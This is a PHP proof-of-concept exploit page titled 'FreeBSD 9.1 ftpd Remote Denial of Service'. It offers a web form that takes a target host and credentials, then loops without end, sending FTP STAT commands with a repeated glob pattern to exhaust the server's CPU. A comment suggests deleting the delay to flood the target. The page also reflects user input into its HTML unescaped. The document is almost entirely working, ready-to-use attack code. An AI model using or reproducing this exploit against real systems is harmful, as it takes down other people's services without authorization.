<?php //PoC by Kacper R. from devilteam.pl //Bug found by: Maksymilian ( cxsec.org ) set_time_limit(0); if(isset($_GET['runit'])){ flush(); while(1){ $fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5); fread($fp,1024); fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024); fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024); fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n"); fclose($fp); time_nanosleep(0,300000000);//delete to flood flush(); } } if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21'; if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous'; echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body> <h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET"> <PRE> Host: <input type="text" name="host" value="'.$_GET['host'].'"> Port: <input type="text" name="port" value="'.$_GET['port'].'"> User: <input type="text" name="user" value="'.$_GET['user'].'"> Pass: <input type="text" name="pass" value="'.$_GET['pass'].'"> </PRE> </p>'; if(isset($_GET['confirm'])){ echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">'; echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt2.gif"></a><a href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png" width="100" hight="40"></a>'; } else{ echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">'; echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/" ><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100" hight="40"></a>'; } echo ' </form> </body> </html>'; ?>